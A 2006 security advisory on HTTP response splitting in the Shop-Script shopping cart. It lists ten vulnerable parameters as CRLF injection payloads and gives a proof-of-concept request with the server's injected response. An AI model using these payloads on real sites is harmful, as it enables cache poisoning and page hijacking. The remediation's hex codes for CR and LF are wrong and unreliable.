Shop-Script.txt

`Vendor: Shop-Script (a division of WebAsyst LLC)  
Application: Shop-Script (www.shop-script.com)  
  
I. Descriptions:  
Shop-Script is a PHP based shopping cart. Multiple links of  
shop-script are vulnerable to a new form of application attack  
technique called HTTP Response splitting (aka CRLF Injection). HTTP  
Response Splitting enables an attacker to alter the HTTP response  
header structure which can leads to various range of attacks such as  
web cache poisoning, temporary defacement, hijacking pages or  
cross-site scripting (XSS). This happens since the user input is  
injected into the value section of http header without properly  
escaping/removing CRLF characters which can leads to two HTTP  
responses instead of one response.  
  
  
II. Affected Links:  
POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header  
HTTP/1.0  
POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0  
POST /premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader:Fake_Custom_Header  
HTTP/1.0  
POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0  
POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0  
POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0  
POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0  
POST /premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&save_voting_results=yes  
HTTP/1.0  
POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0  
POST /premium/index.php?searchstring=<any_keyword>&inside=%0d%0aFakeHeader:Fake_Custom_Header  
HTTP/1.0  
  
  
  
III. Proof-of-concept:  
  
[Request Header]  
  
POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header  
HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET  
CLR 1.1.4322)  
Host: www.shop-script-demo.com  
Content-Length: 18  
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa  
Connection: Close  
Pragma: no-cache  
  
current_currency=1  
  
  
[Response Header]  
  
HTTP/1.1 302 Found  
Date: Mon, 16 Oct 2006 17:39:57 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: index.php?links_exchange=  
FakeHeader:Fake_Custom_Header <= [Custome remsponse injected by the attacker]  
Content-Length: 0  
Connection: close  
Content-Type: text/html  
  
  
  
IV. Remediation:  
Sanitize CR(0x13) and LF(0x10) from the user input or properly encode  
the output in order to prevent the injection of custom  
  
HTTP headers.  
  
  
  
V. Reference:  
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html  
  
  
  
VI. Credits:  
Debasis Mohanty (aka Tr0y)  
www.hackingspirits.com  
  
  
For more vulnerabilities visit -  
http://hackingspirits.com/vuln-rnd/vuln-rnd.html  
  
`